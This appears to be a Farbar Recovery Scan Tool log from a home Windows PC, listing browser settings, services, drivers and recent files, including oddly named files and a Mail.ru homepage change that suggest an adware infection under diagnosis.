Tcpip\Parameters: [DhcpNameServer] 200.42.4.199 200.49.130.51
Tcpip\..\Interfaces\{AC0E2BB8-627F-45DA-94BE-23253C878688}: [DhcpNameServer] 200.42.4.199 200.49.130.51
 
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?bcutc=sp-006
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?bcutc=sp-006
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2176517476-3644118065-910164434-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2176517476-3644118065-910164434-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_151\bin\ssv.dll [2017-10-17] (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-11-16] (AVAST Software)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-10-17] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-11-16] (AVAST Software)
 
FireFox:
========
FF DefaultProfile: aa5kqnf6.default
FF ProfilePath: C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default [2018-01-14]
FF Homepage: Mozilla\Firefox\Profiles\aa5kqnf6.default -> hxxps://inline.go.mail.ru/homepage?inline_comp=hp&inline_hp_cnt=11956636
FF NewTab: Mozilla\Firefox\Profiles\aa5kqnf6.default -> about:newtab
FF NewTabOverride: Mozilla\Firefox\Profiles\aa5kqnf6.default -> Enabled: homepage@mail.ru
FF Extension: (Avast SafePrice) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\Extensions\sp@avast.com.xpi [2018-01-08]
FF Extension: (Avast Online Security) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\Extensions\wrc@avast.com.xpi [2017-10-14]
FF Extension: (Adblock Plus) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-12-12]
FF Extension: (Disable JavaScript Shared Memory) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\features\{f2a7955a-d599-40e9-9a60-f1cef7b5b341}\disable-js-shared-memory@mozilla.org.xpi [2018-01-09] [Legacy]
FF SearchPlugin: C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\searchplugins\google-avast.xml [2018-01-14]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_137.dll [2018-01-14] ()
FF Plugin: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-10-17] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-10-17] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_137.dll [2018-01-14] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin HKU\S-1-5-21-2176517476-3644118065-910164434-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Franco\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://google.com/
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default [2018-01-15]
CHR Extension: (Documentos) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (YouTube) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-05-23]
CHR Extension: (Adblock Plus) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-09-27]
CHR Extension: (AdBlock) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-01-14]
CHR Extension: (Discord Screen Sharing) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\lcbhdgefieegnkbopmgklhlpjjdgmbog [2017-10-30]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-09-10]
CHR Extension: (Gmail) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-05-23]
CHR Extension: (Chrome Media Router) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-12-12]
CHR Profile: C:\Users\Franco\AppData\Local\Google\Chrome\User Data\System Profile [2018-01-14]
CHR HKLM-x32\...\Chrome\Extension: [clgckgfbhciacomhlchmgdnplmdiadbj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [dijfnbhlogmffhgpelodglnnkncadnbi] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2017-11-02] (Advanced Micro Devices) [File not signed]
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7538536 2018-01-07] (AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [301168 2018-01-07] (AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [6971400 2017-11-28] ()
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-04-24] (Disc Soft Ltd)
S2 MBAMService; D:\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
S2 Solvusoft Suite Service; C:\Program Files (x86)\Solvusoft\SuiteService.exe [1284168 2015-11-14] (Solvusoft Corporation)
S4 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10885360 2017-05-31] (TeamViewer GmbH)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 amdacpksd; C:\Windows\system32\drivers\amdacpksd.sys [305544 2017-11-02] (Advanced Micro Devices)
S3 AsrDrv101; C:\Windows\SysWOW64\Drivers\AsrDrv101.sys [22280 2017-05-25] (ASRock Incorporation)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [185096 2018-01-07] (AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdrivera.sys [321512 2018-01-07] (AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsha.sys [199448 2018-01-07] (AVAST Software)
R0 aswblog; C:\Windows\System32\drivers\aswbloga.sys [343768 2018-01-07] (AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniva.sys [57696 2018-01-07] (AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [149344 2018-01-07] (AVAST Software)
S3 aswHwid; C:\Windows\System32\drivers\aswHwid.sys [46976 2018-01-07] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [41832 2017-09-10] (AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [146648 2018-01-10] (AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110336 2018-01-07] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84384 2018-01-07] (AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [1025176 2018-01-07] (AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [457896 2018-01-10] (AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [204456 2018-01-07] (AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [358672 2018-01-07] (AVAST Software)
S3 CEDRIVER60; C:\Program Files (x86)\Cheat Engine 6.7\dbk64.sys [123104 2017-05-30] ()
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2017-06-04] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2017-06-04] (Disc Soft Ltd)
S3 AsrAutoChkUpdDrv; \??\C:\Windows\SysWOW64\Drivers\AsrAutoChkUpdDrv.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-15 20:04 - 2018-01-15 20:04 - 000015124 _____ C:\Users\Franco\Downloads\FRST.txt
2018-01-15 20:02 - 2018-01-15 20:04 - 000000000 ____D C:\FRST
2018-01-15 19:59 - 2018-01-15 19:59 - 002393088 _____ (Farbar) C:\Users\Franco\Downloads\FRST64.exe
2018-01-15 19:59 - 2018-01-15 19:59 - 000000000 ____D C:\Windows\system32\appmgmt
2018-01-15 01:36 - 2018-01-15 01:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-01-15 01:35 - 2018-01-15 01:35 - 000000000 ____D C:\ProgramData\MB3CoreBackup
2018-01-14 22:38 - 2018-01-14 22:38 - 000275384 _____ C:\Windows\Minidump\011418-16239-01.dmp
2018-01-14 19:20 - 2018-01-14 19:20 - 000001167 _____ C:\Users\Franco\Desktop\TS4.exe - Acceso directo.lnk
2018-01-14 14:20 - 2018-01-14 14:20 - 000000000 ____D C:\ProgramData\SWCUTemp
2018-01-14 11:12 - 2018-01-14 11:12 - 000275384 _____ C:\Windows\Minidump\011418-16083-01.dmp
2018-01-14 02:14 - 2018-01-14 03:11 - 000000000 ____D C:\Users\Franco\Downloads\The Sims 4 [FitGirl Repack]
2018-01-14 01:50 - 2018-01-14 02:06 - 3331603898 _____ C:\Users\Franco\Downloads\TS4_Update_1-37-35-1010.rar
2018-01-14 01:33 - 2018-01-14 01:33 - 000000001 _____ C:\Users\Franco\AppData\Local\WMI.ini
2018-01-14 01:33 - 2010-11-21 00:24 - 000186368 _____ (Microsoft Corporation) C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe
2018-01-14 01:33 - 2009-07-13 22:14 - 000001034 _____ C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa
2018-01-14 01:32 - 2018-01-14 01:42 - 000000000 ____D C:\Users\Franco\AppData\Local\Mail.Ru
2018-01-14 01:32 - 2018-01-14 01:35 - 000000000 ____D C:\ProgramData\Mail.Ru
2018-01-14 01:32 - 2018-01-14 01:32 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-01-14 01:28 - 2018-01-14 01:28 - 000000000 ____D C:\Users\Franco\Downloads\plaza-shantae.pirate.queens.quest
2018-01-13 23:00 - 2018-01-13 23:00 - 000000222 _____ C:\Users\Franco\Desktop\No More Room in Hell.url
2018-01-13 22:56 - 2018-01-13 22:56 - 000275384 _____ C:\Windows\Minidump\011318-14788-01.dmp
2018-01-12 02:41 - 2018-01-12 14:56 - 000000000 ____D C:\Users\Franco\Documents\New Unity Project
2018-01-12 02:23 - 2018-01-12 02:23 - 010218507 _____ C:\Users\Franco\Downloads\VRCSDK-2018.01.03.12.06_Public.unitypackage
2018-01-12 02:22 - 2018-01-12 02:22 - 008621715 _____ C:\Users\Franco\Downloads\Cubeds-Unity-Shaders-master.zip
2018-01-12 02:18 - 2018-01-12 02:41 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\DefaultCompany
2018-01-12 02:17 - 2018-01-12 02:40 - 000000000 ____D C:\Users\Franco\Documents\MMD import
2018-01-12 02:12 - 2018-01-14 01:36 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Unity
2018-01-12 02:12 - 2018-01-14 01:36 - 000000000 ____D C:\Users\Franco\AppData\Local\Unity
2018-01-12 02:12 - 2018-01-12 14:31 - 000000000 ____D C:\ProgramData\Unity
2018-01-12 02:12 - 2018-01-12 02:41 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Unity
2018-01-12 02:12 - 2018-01-12 02:12 - 000001282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Users\Franco\AppData\Roaming\vstelemetry
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Visual Studio Setup
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Users\Franco\AppData\Local\ServiceHub
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2018-01-12 02:07 - 2018-01-15 20:02 - 000000000 ____D C:\Program Files (x86)\GtkSharp
2018-01-12 02:06 - 2018-01-12 02:06 - 000000883 _____ C:\Users\Public\Desktop\Unity 5.6.3p1 (64-bit).lnk
2018-01-12 02:06 - 2018-01-12 02:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unity 5.6.3p1 (64-bit)
2018-01-12 02:03 - 2018-01-12 02:06 - 000000000 ____D C:\Program Files\Unity
2018-01-12 01:59 - 2018-01-12 01:59 - 000736496 _____ C:\Users\Franco\Downloads\UnityDownloadAssistant-5.6.3p1.exe
2018-01-12 00:31 - 2018-01-12 00:31 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\VRChat
2018-01-12 00:31 - 2018-01-12 00:31 - 000000000 ____D C:\ProgramData\.mono
2018-01-12 00:23 - 2018-01-12 00:23 - 000000222 _____ C:\Users\Franco\Desktop\VRChat.url
2018-01-11 23:34 - 2018-01-11 23:34 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Bennett Foddy
2018-01-11 23:20 - 2018-01-11 23:31 - 595872063 _____ C:\Users\Franco\Downloads\GETTING OVER IT WITH BENNET FODDY - ToplayAndrew.rar
2018-01-10 20:31 - 2018-01-10 20:31 - 000275384 _____ C:\Windows\Minidump\011018-16130-01.dmp
2018-01-07 23:22 - 2018-01-07 23:22 - 000365680 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2018-01-07 23:22 - 2018-01-07 23:22 - 000149344 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHdsKe.sys
2018-01-07 23:14 - 2018-01-07 23:17 - 000176184 _____ C:\Windows\ntbtlog.txt
2018-01-07 23:14 - 2018-01-07 23:15 - 000271768 _____ C:\Windows\Minidump\010718-17971-01.dmp
2018-01-07 21:35 - 2018-01-07 21:35 - 000000000 ____D C:\Program Files (x86)\Java
2018-01-07 21:24 - 2018-01-07 18:54 - 000000000 ____D C:\Users\Franco\AppData\Local\LogMeIn Hamachi
2018-01-07 21:21 - 2018-01-07 21:23 - 000000000 ____D C:\Users\Franco\AppData\Roaming\.minecraft
2018-01-07 15:28 - 2018-01-07 15:28 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Airship Syndicate
2018-01-07 15:03 - 2018-01-07 15:03 - 000000222 _____ C:\Users\Franco\Desktop\Battle Chasers Nightwar.url
2018-01-02 10:06 - 2018-01-02 10:07 - 000000000 ____D C:\Users\Franco\.prefs
2018-01-02 09:14 - 2018-01-02 09:14 - 000000006 _____ C:\Users\Franco\Desktop\Codigo recuperacion steam.txt
2018-01-02 07:09 - 2018-01-02 07:09 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Trove
2018-01-02 04:22 - 2018-01-02 04:23 - 000000000 ____D C:\Users\Franco\AppData\Local\IdleMaster
2017-12-31 23:28 - 2017-12-31 23:28 - 000275384 _____ C:\Windows\Minidump\123117-15600-01.dmp
2017-12-31 22:24 - 2017-12-31 22:24 - 000275384 _____ C:\Windows\Minidump\123117-14742-01.dmp
2017-12-31 20:47 - 2017-12-31 20:47 - 000275384 _____ C:\Windows\Minidump\123117-19687-01.dmp
2017-12-30 04:03 - 2017-12-30 04:03 - 000275384 _____ C:\Windows\Minidump\123017-14788-01.dmp
2017-12-28 23:57 - 2017-12-28 23:57 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Skype
2017-12-19 04:23 - 2017-12-28 21:43 - 000000926 _____ C:\Users\Franco\Desktop\Starbound.lnk
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-15 19:59 - 2017-05-23 18:45 - 000000000 ____D C:\Program Files (x86)\ATI Technologies
2018-01-15 19:58 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\inf
2018-01-15 19:55 - 2017-11-12 16:32 - 000000000 ____D C:\Users\Franco\AppData\Roaming\discord
2018-01-15 19:55 - 2017-07-04 19:48 - 000000000 ____D C:\Program Files (x86)\Steam
2018-01-15 19:53 - 2017-07-23 19:35 - 000000000 ____D C:\ProgramData\Solvusoft
2018-01-15 19:53 - 2017-05-25 15:18 - 000000300 _____ C:\Windows\Tasks\DriverDoc Auto Start.job
2018-01-15 19:53 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-01-15 08:38 - 2009-07-14 01:45 - 000020896 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-01-15 08:38 - 2009-07-14 01:45 - 000020896 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-01-15 02:04 - 2017-06-04 21:10 - 000000000 ____D C:\Users\Franco\AppData\Local\Adobe
2018-01-15 01:42 - 2017-09-13 23:20 - 000000000 ____D C:\Program Files (x86)\Cheat Engine 6.7
2018-01-15 01:42 - 2017-06-29 23:55 - 000000000 ____D C:\Program Files (x86)\Cheat Engine 6.4
2018-01-15 01:36 - 2017-05-25 15:31 - 000000598 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-01-14 22:38 - 2017-12-05 10:04 - 356131893 _____ C:\Windows\MEMORY.DMP
2018-01-14 22:38 - 2017-11-25 17:06 - 000003872 _____ C:\Windows\System32\Tasks\CCleaner Update
2018-01-14 22:38 - 2017-11-25 17:06 - 000002788 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2018-01-14 22:38 - 2017-11-19 22:29 - 000003152 _____ C:\Windows\System32\Tasks\StartCN
2018-01-14 22:38 - 2017-10-30 04:42 - 000003118 _____ C:\Windows\System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe
2018-01-14 22:38 - 2017-10-30 04:42 - 000003092 _____ C:\Windows\System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe
2018-01-14 22:38 - 2017-10-30 04:42 - 000003090 _____ C:\Windows\System32\Tasks\Microsoft_Hardware_Launch_itype_exe
2018-01-14 22:38 - 2017-06-27 22:48 - 000004498 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2018-01-14 22:38 - 2017-06-04 21:26 - 000003500 _____ C:\Windows\System32\Tasks\AdobeAAMUpdater-1.0-Porota-Franco
2018-01-14 22:38 - 2017-05-25 15:18 - 000002678 _____ C:\Windows\System32\Tasks\DriverDoc Auto Start
2018-01-14 22:38 - 2017-05-23 18:38 - 000000000 ____D C:\Windows\Minidump
2018-01-14 22:38 - 2017-05-23 18:09 - 000003896 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1495573797
2018-01-14 22:38 - 2017-05-23 17:32 - 000003468 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2018-01-14 22:38 - 2017-05-23 17:32 - 000003340 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2018-01-14 22:35 - 2017-05-23 18:08 - 000000000 ____D C:\Windows\System32\Tasks\AVAST Software
2018-01-14 16:11 - 2017-05-26 02:30 - 000000000 ____D C:\Windows\SysWOW64\directx
2018-01-14 16:09 - 2017-05-26 02:30 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-01-14 14:34 - 2017-05-24 13:49 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Mozilla
2018-01-14 11:14 - 2017-05-23 17:57 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2018-01-14 01:41 - 2017-05-23 17:16 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-01-14 01:41 - 2017-05-23 17:16 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-01-14 01:41 - 2017-05-23 17:16 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-01-14 01:41 - 2017-05-23 17:16 - 000000000 ____D C:\Windows\system32\Macromed
2018-01-13 16:33 - 2017-07-17 20:39 - 000000000 ____D C:\Users\Franco\Desktop\pics
2018-01-12 01:24 - 2017-07-17 21:51 - 000000000 ____D C:\Users\Franco\AppData\Local\ElevatedDiagnostics
2018-01-10 19:52 - 2017-05-23 18:07 - 000457896 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2018-01-10 19:52 - 2017-05-23 18:07 - 000146648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2018-01-09 02:46 - 2017-05-23 17:34 - 000002193 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-01-08 23:55 - 2017-11-12 16:32 - 000002127 _____ C:\Users\Franco\Desktop\Discord.lnk
2018-01-08 23:54 - 2017-11-12 16:32 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2018-01-08 23:54 - 2017-11-12 16:32 - 000000000 ____D C:\Users\Franco\AppData\Local\Discord
2018-01-07 23:22 - 2017-11-16 22:10 - 000185096 _____ (AVAST Software) C:\Windows\system32\Drivers\aswArPot.sys
2018-01-07 23:22 - 2017-05-23 18:08 - 000003914 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2018-01-07 23:22 - 2017-05-23 18:07 - 001025176 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000358672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000343768 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbloga.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000321512 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000204456 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000199448 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsha.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000110336 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000084384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000057696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbuniva.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000046976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2018-01-07 23:20 - 2017-05-23 18:07 - 000455384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys.151537806869104
2018-01-07 23:14 - 2017-05-23 16:52 - 000000000 ____D C:\Users\Franco
2018-01-07 22:36 - 2017-07-27 21:19 - 000007606 _____ C:\Users\Franco\AppData\Local\Resmon.ResmonCfg
2018-01-07 18:54 - 2017-12-06 10:10 - 000000000 ____D C:\Program Files\Common Files\Avast Software
2018-01-07 18:54 - 2017-10-17 15:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2018-01-07 18:54 - 2017-07-16 18:50 - 000000000 ____D C:\Users\Franco\AppData\Roaming\obs-studio
2018-01-07 18:54 - 2017-07-16 07:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com
2018-01-07 18:54 - 2017-06-04 21:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe
2018-01-07 18:54 - 2009-07-14 02:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2018-01-07 18:54 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\AppCompat
2018-01-07 18:53 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\registration
2018-01-07 18:52 - 2017-10-17 15:27 - 000000000 ____D C:\Program Files\Java
2018-01-07 18:52 - 2017-07-14 06:25 - 000000000 ____D C:\ProgramData\Oracle
2018-01-05 20:31 - 2017-06-04 20:46 - 000000000 ____D C:\Users\Franco\AppData\Roaming\DAEMON Tools Lite
2018-01-04 15:03 - 2017-06-29 23:55 - 000000000 ____D C:\Users\Franco\Documents\My Cheat Tables
2017-12-30 07:00 - 2017-05-23 17:17 - 000004332 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-12-28 20:25 - 2017-10-03 11:01 - 000000000 ____D C:\Users\Franco\BrawlhallaReplays
2017-12-23 15:34 - 2009-07-14 01:45 - 004888640 _____ C:\Windows\system32\FNTCACHE.DAT
2017-12-23 09:29 - 2017-05-23 17:16 - 000059200 _____ C:\Users\Franco\AppData\Local\GDIPFONTCACHEV1.DAT
2017-12-20 20:12 - 2009-07-14 02:08 - 000032636 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-12-16 21:49 - 2017-11-11 21:49 - 000000222 _____ C:\Users\Franco\Desktop\Battlerite.url
2017-12-16 21:46 - 2017-11-26 19:13 - 000000000 ____D C:\Program Files\Dungeon Siege II
 
==================== Files in the root of some directories =======
 
2018-01-14 01:33 - 2009-07-13 22:14 - 000001141 _____ () C:\Program Files (x86)\Common Files\OeYgZvEuU
2009-07-13 22:14 - 2009-07-13 22:14 - 000001141 _____ () C:\Program Files (x86)\Common Files\OeYgZvEuU.bat
2017-10-10 15:30 - 2017-10-10 15:30 - 000001181 _____ () C:\Users\Franco\AppData\Roaming\trace_FilterInstaller.1.txt
2017-10-10 15:30 - 2017-10-16 03:00 - 000000919 _____ () C:\Users\Franco\AppData\Roaming\trace_FilterInstaller.txt
2017-10-10 15:30 - 2017-10-16 03:00 - 000000000 _____ () C:\Users\Franco\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2018-01-14 01:33 - 2009-07-13 22:14 - 000001034 _____ () C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa
